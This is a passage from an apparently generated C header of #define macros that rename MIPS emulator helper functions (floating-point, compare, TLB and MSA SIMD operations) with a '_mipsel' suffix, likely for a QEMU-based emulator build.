#define helper_float_abs_s helper_float_abs_s_mipsel #define helper_float_abs_ps helper_float_abs_ps_mipsel #define helper_float_chs_d helper_float_chs_d_mipsel #define helper_float_chs_s helper_float_chs_s_mipsel #define helper_float_chs_ps helper_float_chs_ps_mipsel #define helper_float_recip_d helper_float_recip_d_mipsel #define helper_float_recip_s helper_float_recip_s_mipsel #define helper_float_rsqrt_d helper_float_rsqrt_d_mipsel #define helper_float_rsqrt_s helper_float_rsqrt_s_mipsel #define helper_float_recip1_d helper_float_recip1_d_mipsel #define helper_float_recip1_s helper_float_recip1_s_mipsel #define helper_float_recip1_ps helper_float_recip1_ps_mipsel #define helper_float_rsqrt1_d helper_float_rsqrt1_d_mipsel #define helper_float_rsqrt1_s helper_float_rsqrt1_s_mipsel #define helper_float_rsqrt1_ps helper_float_rsqrt1_ps_mipsel #define helper_float_rint_s helper_float_rint_s_mipsel #define helper_float_rint_d helper_float_rint_d_mipsel #define float_class_s float_class_s_mipsel #define helper_float_class_s helper_float_class_s_mipsel #define float_class_d float_class_d_mipsel #define helper_float_class_d helper_float_class_d_mipsel #define helper_float_add_d helper_float_add_d_mipsel #define helper_float_add_s helper_float_add_s_mipsel #define helper_float_add_ps helper_float_add_ps_mipsel #define helper_float_sub_d helper_float_sub_d_mipsel #define helper_float_sub_s helper_float_sub_s_mipsel #define helper_float_sub_ps helper_float_sub_ps_mipsel #define helper_float_mul_d helper_float_mul_d_mipsel #define helper_float_mul_s helper_float_mul_s_mipsel #define helper_float_mul_ps helper_float_mul_ps_mipsel #define helper_float_div_d helper_float_div_d_mipsel #define helper_float_div_s helper_float_div_s_mipsel #define helper_float_div_ps helper_float_div_ps_mipsel #define helper_float_recip2_d helper_float_recip2_d_mipsel #define helper_float_recip2_s helper_float_recip2_s_mipsel #define helper_float_recip2_ps helper_float_recip2_ps_mipsel #define helper_float_rsqrt2_d helper_float_rsqrt2_d_mipsel #define helper_float_rsqrt2_s helper_float_rsqrt2_s_mipsel #define helper_float_rsqrt2_ps helper_float_rsqrt2_ps_mipsel #define helper_float_addr_ps helper_float_addr_ps_mipsel #define helper_float_mulr_ps helper_float_mulr_ps_mipsel #define helper_float_max_s helper_float_max_s_mipsel #define helper_float_max_d helper_float_max_d_mipsel #define helper_float_maxa_s helper_float_maxa_s_mipsel #define helper_float_maxa_d helper_float_maxa_d_mipsel #define helper_float_min_s helper_float_min_s_mipsel #define helper_float_min_d helper_float_min_d_mipsel #define helper_float_mina_s helper_float_mina_s_mipsel #define helper_float_mina_d helper_float_mina_d_mipsel #define helper_float_madd_d helper_float_madd_d_mipsel #define helper_float_madd_s helper_float_madd_s_mipsel #define helper_float_madd_ps helper_float_madd_ps_mipsel #define helper_float_msub_d helper_float_msub_d_mipsel #define helper_float_msub_s helper_float_msub_s_mipsel #define helper_float_msub_ps helper_float_msub_ps_mipsel #define helper_float_nmadd_d helper_float_nmadd_d_mipsel #define helper_float_nmadd_s helper_float_nmadd_s_mipsel #define helper_float_nmadd_ps helper_float_nmadd_ps_mipsel #define helper_float_nmsub_d helper_float_nmsub_d_mipsel #define helper_float_nmsub_s helper_float_nmsub_s_mipsel #define helper_float_nmsub_ps helper_float_nmsub_ps_mipsel #define helper_float_maddf_s helper_float_maddf_s_mipsel #define helper_float_maddf_d helper_float_maddf_d_mipsel #define helper_float_msubf_s helper_float_msubf_s_mipsel #define helper_float_msubf_d helper_float_msubf_d_mipsel #define helper_cmp_d_f helper_cmp_d_f_mipsel #define helper_cmpabs_d_f helper_cmpabs_d_f_mipsel #define helper_cmp_d_un helper_cmp_d_un_mipsel #define helper_cmpabs_d_un helper_cmpabs_d_un_mipsel #define helper_cmp_d_eq helper_cmp_d_eq_mipsel #define helper_cmpabs_d_eq helper_cmpabs_d_eq_mipsel #define helper_cmp_d_ueq helper_cmp_d_ueq_mipsel #define helper_cmpabs_d_ueq helper_cmpabs_d_ueq_mipsel #define helper_cmp_d_olt helper_cmp_d_olt_mipsel #define helper_cmpabs_d_olt helper_cmpabs_d_olt_mipsel #define helper_cmp_d_ult helper_cmp_d_ult_mipsel #define helper_cmpabs_d_ult helper_cmpabs_d_ult_mipsel #define helper_cmp_d_ole helper_cmp_d_ole_mipsel #define helper_cmpabs_d_ole helper_cmpabs_d_ole_mipsel #define helper_cmp_d_ule helper_cmp_d_ule_mipsel #define helper_cmpabs_d_ule helper_cmpabs_d_ule_mipsel #define helper_cmp_d_sf helper_cmp_d_sf_mipsel #define helper_cmpabs_d_sf helper_cmpabs_d_sf_mipsel #define helper_cmp_d_ngle helper_cmp_d_ngle_mipsel #define helper_cmpabs_d_ngle helper_cmpabs_d_ngle_mipsel #define helper_cmp_d_seq helper_cmp_d_seq_mipsel #define helper_cmpabs_d_seq helper_cmpabs_d_seq_mipsel #define helper_cmp_d_ngl helper_cmp_d_ngl_mipsel #define helper_cmpabs_d_ngl helper_cmpabs_d_ngl_mipsel #define helper_cmp_d_lt helper_cmp_d_lt_mipsel #define helper_cmpabs_d_lt helper_cmpabs_d_lt_mipsel #define helper_cmp_d_nge helper_cmp_d_nge_mipsel #define helper_cmpabs_d_nge helper_cmpabs_d_nge_mipsel #define helper_cmp_d_le helper_cmp_d_le_mipsel #define helper_cmpabs_d_le helper_cmpabs_d_le_mipsel #define helper_cmp_d_ngt helper_cmp_d_ngt_mipsel #define helper_cmpabs_d_ngt helper_cmpabs_d_ngt_mipsel #define helper_cmp_s_f helper_cmp_s_f_mipsel #define helper_cmpabs_s_f helper_cmpabs_s_f_mipsel #define helper_cmp_s_un helper_cmp_s_un_mipsel #define helper_cmpabs_s_un helper_cmpabs_s_un_mipsel #define helper_cmp_s_eq helper_cmp_s_eq_mipsel #define helper_cmpabs_s_eq helper_cmpabs_s_eq_mipsel #define helper_cmp_s_ueq helper_cmp_s_ueq_mipsel #define helper_cmpabs_s_ueq helper_cmpabs_s_ueq_mipsel #define helper_cmp_s_olt helper_cmp_s_olt_mipsel #define helper_cmpabs_s_olt helper_cmpabs_s_olt_mipsel #define helper_cmp_s_ult helper_cmp_s_ult_mipsel #define helper_cmpabs_s_ult helper_cmpabs_s_ult_mipsel #define helper_cmp_s_ole helper_cmp_s_ole_mipsel #define helper_cmpabs_s_ole helper_cmpabs_s_ole_mipsel #define helper_cmp_s_ule helper_cmp_s_ule_mipsel #define helper_cmpabs_s_ule helper_cmpabs_s_ule_mipsel #define helper_cmp_s_sf helper_cmp_s_sf_mipsel #define helper_cmpabs_s_sf helper_cmpabs_s_sf_mipsel #define helper_cmp_s_ngle helper_cmp_s_ngle_mipsel #define helper_cmpabs_s_ngle helper_cmpabs_s_ngle_mipsel #define helper_cmp_s_seq helper_cmp_s_seq_mipsel #define helper_cmpabs_s_seq helper_cmpabs_s_seq_mipsel #define helper_cmp_s_ngl helper_cmp_s_ngl_mipsel #define helper_cmpabs_s_ngl helper_cmpabs_s_ngl_mipsel #define helper_cmp_s_lt helper_cmp_s_lt_mipsel #define helper_cmpabs_s_lt helper_cmpabs_s_lt_mipsel #define helper_cmp_s_nge helper_cmp_s_nge_mipsel #define helper_cmpabs_s_nge helper_cmpabs_s_nge_mipsel #define helper_cmp_s_le helper_cmp_s_le_mipsel #define helper_cmpabs_s_le helper_cmpabs_s_le_mipsel #define helper_cmp_s_ngt helper_cmp_s_ngt_mipsel #define helper_cmpabs_s_ngt helper_cmpabs_s_ngt_mipsel #define helper_cmp_ps_f helper_cmp_ps_f_mipsel #define helper_cmpabs_ps_f helper_cmpabs_ps_f_mipsel #define helper_cmp_ps_un helper_cmp_ps_un_mipsel #define helper_cmpabs_ps_un helper_cmpabs_ps_un_mipsel #define helper_cmp_ps_eq helper_cmp_ps_eq_mipsel #define helper_cmpabs_ps_eq helper_cmpabs_ps_eq_mipsel #define helper_cmp_ps_ueq helper_cmp_ps_ueq_mipsel #define helper_cmpabs_ps_ueq helper_cmpabs_ps_ueq_mipsel #define helper_cmp_ps_olt helper_cmp_ps_olt_mipsel #define helper_cmpabs_ps_olt helper_cmpabs_ps_olt_mipsel #define helper_cmp_ps_ult helper_cmp_ps_ult_mipsel #define helper_cmpabs_ps_ult helper_cmpabs_ps_ult_mipsel #define helper_cmp_ps_ole helper_cmp_ps_ole_mipsel #define helper_cmpabs_ps_ole helper_cmpabs_ps_ole_mipsel #define helper_cmp_ps_ule helper_cmp_ps_ule_mipsel #define helper_cmpabs_ps_ule helper_cmpabs_ps_ule_mipsel #define helper_cmp_ps_sf helper_cmp_ps_sf_mipsel #define helper_cmpabs_ps_sf helper_cmpabs_ps_sf_mipsel #define helper_cmp_ps_ngle helper_cmp_ps_ngle_mipsel #define helper_cmpabs_ps_ngle helper_cmpabs_ps_ngle_mipsel #define helper_cmp_ps_seq helper_cmp_ps_seq_mipsel #define helper_cmpabs_ps_seq helper_cmpabs_ps_seq_mipsel #define helper_cmp_ps_ngl helper_cmp_ps_ngl_mipsel #define helper_cmpabs_ps_ngl helper_cmpabs_ps_ngl_mipsel #define helper_cmp_ps_lt helper_cmp_ps_lt_mipsel #define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mipsel #define helper_cmp_ps_nge helper_cmp_ps_nge_mipsel #define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mipsel #define helper_cmp_ps_le helper_cmp_ps_le_mipsel #define helper_cmpabs_ps_le helper_cmpabs_ps_le_mipsel #define helper_cmp_ps_ngt helper_cmp_ps_ngt_mipsel #define helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mipsel #define helper_r6_cmp_d_af helper_r6_cmp_d_af_mipsel #define helper_r6_cmp_d_un helper_r6_cmp_d_un_mipsel #define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mipsel #define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mipsel #define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mipsel #define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mipsel #define helper_r6_cmp_d_le helper_r6_cmp_d_le_mipsel #define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mipsel #define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mipsel #define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mipsel #define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mipsel #define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mipsel #define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mipsel #define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mipsel #define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mipsel #define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mipsel #define helper_r6_cmp_d_or helper_r6_cmp_d_or_mipsel #define helper_r6_cmp_d_une helper_r6_cmp_d_une_mipsel #define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mipsel #define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mipsel #define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mipsel #define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mipsel #define helper_r6_cmp_s_af helper_r6_cmp_s_af_mipsel #define helper_r6_cmp_s_un helper_r6_cmp_s_un_mipsel #define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mipsel #define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mipsel #define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mipsel #define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mipsel #define helper_r6_cmp_s_le helper_r6_cmp_s_le_mipsel #define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mipsel #define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mipsel #define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mipsel #define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mipsel #define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mipsel #define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mipsel #define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mipsel #define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mipsel #define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mipsel #define helper_r6_cmp_s_or helper_r6_cmp_s_or_mipsel #define helper_r6_cmp_s_une helper_r6_cmp_s_une_mipsel #define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mipsel #define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mipsel #define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mipsel #define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mipsel #define no_mmu_map_address no_mmu_map_address_mipsel #define fixed_mmu_map_address fixed_mmu_map_address_mipsel #define r4k_map_address r4k_map_address_mipsel #define cpu_mips_tlb_flush cpu_mips_tlb_flush_mipsel #define sync_c0_status sync_c0_status_mipsel #define cpu_mips_store_status cpu_mips_store_status_mipsel #define cpu_mips_store_cause cpu_mips_store_cause_mipsel #define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mipsel #define mips_cpu_tlb_fill mips_cpu_tlb_fill_mipsel #define cpu_mips_translate_address cpu_mips_translate_address_mipsel #define exception_resume_pc exception_resume_pc_mipsel #define mips_cpu_do_interrupt mips_cpu_do_interrupt_mipsel #define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mipsel #define r4k_invalidate_tlb r4k_invalidate_tlb_mipsel #define do_raise_exception_err do_raise_exception_err_mipsel #define helper_paddsb helper_paddsb_mipsel #define helper_paddusb helper_paddusb_mipsel #define helper_paddsh helper_paddsh_mipsel #define helper_paddush helper_paddush_mipsel #define helper_paddb helper_paddb_mipsel #define helper_paddh helper_paddh_mipsel #define helper_paddw helper_paddw_mipsel #define helper_psubsb helper_psubsb_mipsel #define helper_psubusb helper_psubusb_mipsel #define helper_psubsh helper_psubsh_mipsel #define helper_psubush helper_psubush_mipsel #define helper_psubb helper_psubb_mipsel #define helper_psubh helper_psubh_mipsel #define helper_psubw helper_psubw_mipsel #define helper_pshufh helper_pshufh_mipsel #define helper_packsswh helper_packsswh_mipsel #define helper_packsshb helper_packsshb_mipsel #define helper_packushb helper_packushb_mipsel #define helper_punpcklwd helper_punpcklwd_mipsel #define helper_punpckhwd helper_punpckhwd_mipsel #define helper_punpcklhw helper_punpcklhw_mipsel #define helper_punpckhhw helper_punpckhhw_mipsel #define helper_punpcklbh helper_punpcklbh_mipsel #define helper_punpckhbh helper_punpckhbh_mipsel #define helper_pavgh helper_pavgh_mipsel #define helper_pavgb helper_pavgb_mipsel #define helper_pmaxsh helper_pmaxsh_mipsel #define helper_pminsh helper_pminsh_mipsel #define helper_pmaxub helper_pmaxub_mipsel #define helper_pminub helper_pminub_mipsel #define helper_pcmpeqw helper_pcmpeqw_mipsel #define helper_pcmpgtw helper_pcmpgtw_mipsel #define helper_pcmpeqh helper_pcmpeqh_mipsel #define helper_pcmpgth helper_pcmpgth_mipsel #define helper_pcmpeqb helper_pcmpeqb_mipsel #define helper_pcmpgtb helper_pcmpgtb_mipsel #define helper_psllw helper_psllw_mipsel #define helper_psrlw helper_psrlw_mipsel #define helper_psraw helper_psraw_mipsel #define helper_psllh helper_psllh_mipsel #define helper_psrlh helper_psrlh_mipsel #define helper_psrah helper_psrah_mipsel #define helper_pmullh helper_pmullh_mipsel #define helper_pmulhh helper_pmulhh_mipsel #define helper_pmulhuh helper_pmulhuh_mipsel #define helper_pmaddhw helper_pmaddhw_mipsel #define helper_pasubub helper_pasubub_mipsel #define helper_biadd helper_biadd_mipsel #define helper_pmovmskb helper_pmovmskb_mipsel #define helper_msa_nloc_b helper_msa_nloc_b_mipsel #define helper_msa_nloc_h helper_msa_nloc_h_mipsel #define helper_msa_nloc_w helper_msa_nloc_w_mipsel #define helper_msa_nloc_d helper_msa_nloc_d_mipsel #define helper_msa_nlzc_b helper_msa_nlzc_b_mipsel #define helper_msa_nlzc_h helper_msa_nlzc_h_mipsel #define helper_msa_nlzc_w helper_msa_nlzc_w_mipsel #define helper_msa_nlzc_d helper_msa_nlzc_d_mipsel #define helper_msa_pcnt_b helper_msa_pcnt_b_mipsel #define helper_msa_pcnt_h helper_msa_pcnt_h_mipsel #define helper_msa_pcnt_w helper_msa_pcnt_w_mipsel #define helper_msa_pcnt_d helper_msa_pcnt_d_mipsel #define helper_msa_binsl_b helper_msa_binsl_b_mipsel #define helper_msa_binsl_h helper_msa_binsl_h_mipsel #define helper_msa_binsl_w helper_msa_binsl_w_mipsel #define helper_msa_binsl_d helper_msa_binsl_d_mipsel #define helper_msa_binsr_b helper_msa_binsr_b_mipsel #define helper_msa_binsr_h helper_msa_binsr_h_mipsel #define helper_msa_binsr_w helper_msa_binsr_w_mipsel #define helper_msa_binsr_d helper_msa_binsr_d_mipsel #define helper_msa_bmnz_v helper_msa_bmnz_v_mipsel #define helper_msa_bmz_v helper_msa_bmz_v_mipsel #define helper_msa_bsel_v helper_msa_bsel_v_mipsel #define helper_msa_bclr_b helper_msa_bclr_b_mipsel #define helper_msa_bclr_h helper_msa_bclr_h_mipsel #define helper_msa_bclr_w helper_msa_bclr_w_mipsel #define helper_msa_bclr_d helper_msa_bclr_d_mipsel #define helper_msa_bneg_b helper_msa_bneg_b_mipsel #define helper_msa_bneg_h helper_msa_bneg_h_mipsel #define helper_msa_bneg_w helper_msa_bneg_w_mipsel #define helper_msa_bneg_d helper_msa_bneg_d_mipsel #define helper_msa_bset_b helper_msa_bset_b_mipsel #define helper_msa_bset_h helper_msa_bset_h_mipsel #define helper_msa_bset_w helper_msa_bset_w_mipsel #define helper_msa_bset_d helper_msa_bset_d_mipsel #define helper_msa_add_a_b helper_msa_add_a_b_mipsel #define helper_msa_add_a_h helper_msa_add_a_h_mipsel #define helper_msa_add_a_w helper_msa_add_a_w_mipsel #define helper_msa_add_a_d helper_msa_add_a_d_mipsel #define helper_msa_adds_a_b helper_msa_adds_a_b_mipsel #define helper_msa_adds_a_h helper_msa_adds_a_h_mipsel #define helper_msa_adds_a_w helper_msa_adds_a_w_mipsel #define helper_msa_adds_a_d helper_msa_adds_a_d_mipsel #define helper_msa_adds_s_b helper_msa_adds_s_b_mipsel #define helper_msa_adds_s_h helper_msa_adds_s_h_mipsel #define helper_msa_adds_s_w helper_msa_adds_s_w_mipsel #define helper_msa_adds_s_d helper_msa_adds_s_d_mipsel #define helper_msa_adds_u_b helper_msa_adds_u_b_mipsel #define helper_msa_adds_u_h helper_msa_adds_u_h_mipsel #define helper_msa_adds_u_w helper_msa_adds_u_w_mipsel #define helper_msa_adds_u_d helper_msa_adds_u_d_mipsel #define helper_msa_addv_b helper_msa_addv_b_mipsel #define helper_msa_addv_h helper_msa_addv_h_mipsel #define helper_msa_addv_w helper_msa_addv_w_mipsel #define helper_msa_addv_d helper_msa_addv_d_mipsel #define helper_msa_hadd_s_h helper_msa_hadd_s_h_mipsel #define helper_msa_hadd_s_w helper_msa_hadd_s_w_mipsel #define helper_msa_hadd_s_d helper_msa_hadd_s_d_mipsel #define helper_msa_hadd_u_h helper_msa_hadd_u_h_mipsel #define helper_msa_hadd_u_w helper_msa_hadd_u_w_mipsel #define helper_msa_hadd_u_d helper_msa_hadd_u_d_mipsel #define helper_msa_ave_s_b helper_msa_ave_s_b_mipsel #define helper_msa_ave_s_h helper_msa_ave_s_h_mipsel #define helper_msa_ave_s_w helper_msa_ave_s_w_mipsel #define helper_msa_ave_s_d helper_msa_ave_s_d_mipsel #define helper_msa_ave_u_b helper_msa_ave_u_b_mipsel #define helper_msa_ave_u_h helper_msa_ave_u_h_mipsel #define helper_msa_ave_u_w helper_msa_ave_u_w_mipsel #define helper_msa_ave_u_d helper_msa_ave_u_d_mipsel #define helper_msa_aver_s_b helper_msa_aver_s_b_mipsel #define helper_msa_aver_s_h helper_msa_aver_s_h_mipsel #define helper_msa_aver_s_w helper_msa_aver_s_w_mipsel #define helper_msa_aver_s_d helper_msa_aver_s_d_mipsel #define helper_msa_aver_u_b helper_msa_aver_u_b_mipsel #define helper_msa_aver_u_h helper_msa_aver_u_h_mipsel #define helper_msa_aver_u_w helper_msa_aver_u_w_mipsel #define helper_msa_aver_u_d helper_msa_aver_u_d_mipsel #define helper_msa_ceq_b helper_msa_ceq_b_mipsel #define helper_msa_ceq_h helper_msa_ceq_h_mipsel #define helper_msa_ceq_w helper_msa_ceq_w_mipsel #define helper_msa_ceq_d helper_msa_ceq_d_mipsel #define helper_msa_cle_s_b helper_msa_cle_s_b_mipsel #define helper_msa_cle_s_h helper_msa_cle_s_h_mipsel #define helper_msa_cle_s_w helper_msa_cle_s_w_mipsel #define helper_msa_cle_s_d helper_msa_cle_s_d_mipsel #define helper_msa_cle_u_b helper_msa_cle_u_b_mipsel #define helper_msa_cle_u_h helper_msa_cle_u_h_mipsel #define helper_msa_cle_u_w helper_msa_cle_u_w_mipsel #define helper_msa_cle_u_d helper_msa_cle_u_d_mipsel #define helper_msa_clt_s_b helper_msa_clt_s_b_mipsel #define helper_msa_clt_s_h helper_msa_clt_s_h_mipsel #define helper_msa_clt_s_w helper_msa_clt_s_w_mipsel #define helper_msa_clt_s_d helper_msa_clt_s_d_mipsel #define helper_msa_clt_u_b helper_msa_clt_u_b_mipsel #define helper_msa_clt_u_h helper_msa_clt_u_h_mipsel #define helper_msa_clt_u_w helper_msa_clt_u_w_mipsel #define helper_msa_clt_u_d helper_msa_clt_u_d_mipsel #define helper_msa_div_s_b helper_msa_div_s_b_mipsel #define helper_msa_div_s_h helper_msa_div_s_h_mipsel #define helper_msa_div_s_w helper_msa_div_s_w_mipsel #define helper_msa_div_s_d helper_msa_div_s_d_mipsel #define helper_msa_div_u_b helper_msa_div_u_b_mipsel #define helper_msa_div_u_h helper_msa_div_u_h_mipsel #define helper_msa_div_u_w helper_msa_div_u_w_mipsel #define helper_msa_div_u_d helper_msa_div_u_d_mipsel #define helper_msa_max_a_b helper_msa_max_a_b_mipsel #define helper_msa_max_a_h helper_msa_max_a_h_mipsel #define helper_msa_max_a_w helper_msa_max_a_w_mipsel #define helper_msa_max_a_d helper_msa_max_a_d_mipsel #define helper_msa_max_s_b helper_msa_max_s_b_mipsel #define helper_msa_max_s_h helper_msa_max_s_h_mipsel #define helper_msa_max_s_w helper_msa_max_s_w_mipsel #define helper_msa_max_s_d helper_msa_max_s_d_mipsel #define helper_msa_max_u_b helper_msa_max_u_b_mipsel #define helper_msa_max_u_h helper_msa_max_u_h_mipsel #define helper_msa_max_u_w helper_msa_max_u_w_mipsel #define helper_msa_max_u_d helper_msa_max_u_d_mipsel #define helper_msa_min_a_b helper_msa_min_a_b_mipsel #define helper_msa_min_a_h helper_msa_min_a_h_mipsel #define helper_msa_min_a_w helper_msa_min_a_w_mipsel #define helper_msa_min_a_d helper_msa_min_a_d_mipsel #define helper_msa_min_s_b helper_msa_min_s_b_mipsel #define helper_msa_min_s_h helper_msa_min_s_h_mipsel #define helper_msa_min_s_w helper_msa_min_s_w_mipsel #define helper_msa_min_s_d helper_msa_min_s_d_mipsel #define helper_msa_min_u_b helper_msa_min_u_b_mipsel #define helper_msa_min_u_h helper_msa_min_u_h_mipsel #define helper_msa_min_u_w helper_msa_min_u_w_mipsel #define helper_msa_min_u_d helper_msa_min_u_d_mipsel #define helper_msa_mod_s_b helper_msa_mod_s_b_mipsel #define helper_msa_mod_s_h helper_msa_mod_s_h_mipsel #define helper_msa_mod_s_w helper_msa_mod_s_w_mipsel #define helper_msa_mod_s_d helper_msa_mod_s_d_mipsel #define helper_msa_mod_u_b helper_msa_mod_u_b_mipsel #define helper_msa_mod_u_h helper_msa_mod_u_h_mipsel #define helper_msa_mod_u_w helper_msa_mod_u_w_mipsel #define helper_msa_mod_u_d helper_msa_mod_u_d_mipsel #define helper_msa_asub_s_b helper_msa_asub_s_b_mipsel #define helper_msa_asub_s_h helper_msa_asub_s_h_mipsel #define helper_msa_asub_s_w helper_msa_asub_s_w_mipsel #define helper_msa_asub_s_d helper_msa_asub_s_d_mipsel #define helper_msa_asub_u_b helper_msa_asub_u_b_mipsel #define helper_msa_asub_u_h helper_msa_asub_u_h_mipsel #define helper_msa_asub_u_w helper_msa_asub_u_w_mipsel #define helper_msa_asub_u_d helper_msa_asub_u_d_mipsel #define helper_msa_hsub_s_h helper_msa_hsub_s_h_mipsel #define helper_msa_hsub_s_w helper_msa_hsub_s_w_mipsel #define helper_msa_hsub_s_d helper_msa_hsub_s_d_mipsel #define helper_msa_hsub_u_h helper_msa_hsub_u_h_mipsel #define helper_msa_hsub_u_w helper_msa_hsub_u_w_mipsel #define helper_msa_hsub_u_d helper_msa_hsub_u_d_mipsel #define helper_msa_ilvev_b helper_msa_ilvev_b_mipsel #define helper_msa_ilvev_h helper_msa_ilvev_h_mipsel #define helper_msa_ilvev_w helper_msa_ilvev_w_mipsel #define helper_msa_ilvev_d helper_msa_ilvev_d_mipsel #define helper_msa_ilvod_b helper_msa_ilvod_b_mipsel #define helper_msa_ilvod_h helper_msa_ilvod_h_mipsel #define helper_msa_ilvod_w helper_msa_ilvod_w_mipsel #define helper_msa_ilvod_d helper_msa_ilvod_d_mipsel #define helper_msa_ilvl_b helper_msa_ilvl_b_mipsel #define helper_msa_ilvl_h helper_msa_ilvl_h_mipsel #define helper_msa_ilvl_w helper_msa_ilvl_w_mipsel #define helper_msa_ilvl_d helper_msa_ilvl_d_mipsel #define helper_msa_ilvr_b helper_msa_ilvr_b_mipsel #define helper_msa_ilvr_h helper_msa_ilvr_h_mipsel #define helper_msa_ilvr_w helper_msa_ilvr_w_mipsel #define helper_msa_ilvr_d helper_msa_ilvr_d_mipsel #define helper_msa_and_v helper_msa_and_v_mipsel #define helper_msa_nor_v helper_msa_nor_v_mipsel #define helper_msa_or_v helper_msa_or_v_mipsel #define helper_msa_xor_v helper_msa_xor_v_mipsel #define helper_msa_move_v helper_msa_move_v_mipsel #define helper_msa_pckev_b helper_msa_pckev_b_mipsel #define helper_msa_pckev_h helper_msa_pckev_h_mipsel #define helper_msa_pckev_w helper_msa_pckev_w_mipsel #define helper_msa_pckev_d helper_msa_pckev_d_mipsel #define helper_msa_pckod_b helper_msa_pckod_b_mipsel #define helper_msa_pckod_h helper_msa_pckod_h_mipsel #define helper_msa_pckod_w helper_msa_pckod_w_mipsel #define helper_msa_pckod_d helper_msa_pckod_d_mipsel #define helper_msa_sll_b helper_msa_sll_b_mipsel #define helper_msa_sll_h helper_msa_sll_h_mipsel #define helper_msa_sll_w helper_msa_sll_w_mipsel #define helper_msa_sll_d helper_msa_sll_d_mipsel #define helper_msa_sra_b helper_msa_sra_b_mipsel #define helper_msa_sra_h helper_msa_sra_h_mipsel #define helper_msa_sra_w helper_msa_sra_w_mipsel #define helper_msa_sra_d helper_msa_sra_d_mipsel #define helper_msa_srar_b helper_msa_srar_b_mipsel #define helper_msa_srar_h helper_msa_srar_h_mipsel #define helper_msa_srar_w helper_msa_srar_w_mipsel #define helper_msa_srar_d helper_msa_srar_d_mipsel #define helper_msa_srl_b helper_msa_srl_b_mipsel #define helper_msa_srl_h helper_msa_srl_h_mipsel #define helper_msa_srl_w helper_msa_srl_w_mipsel #define helper_msa_srl_d helper_msa_srl_d_mipsel #define helper_msa_srlr_b helper_msa_srlr_b_mipsel #define helper_msa_srlr_h helper_msa_srlr_h_mipsel #define helper_msa_srlr_w helper_msa_srlr_w_mipsel #define helper_msa_srlr_d helper_msa_srlr_d_mipsel #define helper_msa_andi_b helper_msa_andi_b_mipsel #define helper_msa_ori_b helper_msa_ori_b_mipsel #define helper_msa_nori_b helper_msa_nori_b_mipsel #define helper_msa_xori_b helper_msa_xori_b_mipsel #define helper_msa_bmnzi_b helper_msa_bmnzi_b_mipsel #define helper_msa_bmzi_b helper_msa_bmzi_b_mipsel #define helper_msa_bseli_b helper_msa_bseli_b_mipsel #define helper_msa_shf_df helper_msa_shf_df_mipsel #define helper_msa_addvi_df helper_msa_addvi_df_mipsel #define helper_msa_subvi_df helper_msa_subvi_df_mipsel #define helper_msa_ceqi_df helper_msa_ceqi_df_mipsel #define helper_msa_clei_s_df helper_msa_clei_s_df_mipsel #define helper_msa_clei_u_df helper_msa_clei_u_df_mipsel #define helper_msa_clti_s_df helper_msa_clti_s_df_mipsel #define helper_msa_clti_u_df helper_msa_clti_u_df_mipsel #define helper_msa_maxi_s_df helper_msa_maxi_s_df_mipsel #define helper_msa_maxi_u_df helper_msa_maxi_u_df_mipsel #define helper_msa_mini_s_df helper_msa_mini_s_df_mipsel #define helper_msa_mini_u_df helper_msa_mini_u_df_mipsel #define helper_msa_ldi_df helper_msa_ldi_df_mipsel #define helper_msa_slli_df helper_msa_slli_df_mipsel #define helper_msa_srai_df helper_msa_srai_df_mipsel #define helper_msa_srli_df helper_msa_srli_df_mipsel #define helper_msa_bclri_df helper_msa_bclri_df_mipsel #define helper_msa_bseti_df helper_msa_bseti_df_mipsel #define helper_msa_bnegi_df helper_msa_bnegi_df_mipsel #define helper_msa_sat_s_df helper_msa_sat_s_df_mipsel #define helper_msa_sat_u_df helper_msa_sat_u_df_mipsel #define helper_msa_srari_df helper_msa_srari_df_mipsel #define helper_msa_srlri_df helper_msa_srlri_df_mipsel #define helper_msa_binsli_df helper_msa_binsli_df_mipsel #define helper_msa_binsri_df helper_msa_binsri_df_mipsel #define helper_msa_subv_df helper_msa_subv_df_mipsel #define helper_msa_subs_s_df helper_msa_subs_s_df_mipsel #define helper_msa_subs_u_df helper_msa_subs_u_df_mipsel #define helper_msa_subsus_u_df helper_msa_subsus_u_df_mipsel #define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mipsel #define helper_msa_mulv_df helper_msa_mulv_df_mipsel #define helper_msa_dotp_s_df helper_msa_dotp_s_df_mipsel #define helper_msa_dotp_u_df helper_msa_dotp_u_df_mipsel #define helper_msa_mul_q_df helper_msa_mul_q_df_mipsel 